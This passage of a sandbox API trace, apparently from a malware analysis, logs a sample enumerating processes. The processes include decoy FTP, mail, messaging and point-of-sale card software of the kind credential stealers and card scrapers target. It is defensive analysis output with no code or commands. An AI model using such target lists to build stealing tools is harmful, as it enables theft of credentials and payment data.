th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.166] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.170] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.172] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.173] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.175] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.176] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.177] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0278.206] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0278.207] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0278.209] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.210] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0278.212] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0278.214] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0278.218] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0278.220] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0278.221] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.223] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0278.225] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0278.227] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0278.230] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0278.235] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0278.237] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0278.239] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0278.241] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0278.243] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0278.250] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0278.251] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0278.253] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0278.254] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0278.256] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0278.257] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0278.259] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0278.261] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0278.265] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0278.267] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0278.268] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0278.270] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0278.271] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0278.273] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0278.274] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0278.280] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0278.282] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0278.284] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0278.285] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0278.287] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0278.288] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0278.291] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0278.385] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0278.388] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0278.389] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0278.391] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0278.393] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0278.395] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0278.396] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0278.398] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0278.400] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0278.401] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0278.406] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0278.408] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0278.409] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0278.411] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0278.412] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0278.414] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0278.416] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0278.420] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0278.421] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0278.426] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0278.427] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0278.429] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0278.431] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0278.433] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0278.437] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0278.438] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0278.440] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0278.442] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0278.443] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0278.445] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0278.447] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0278.452] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0278.454] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0278.456] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0278.458] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0278.460] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0278.462] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 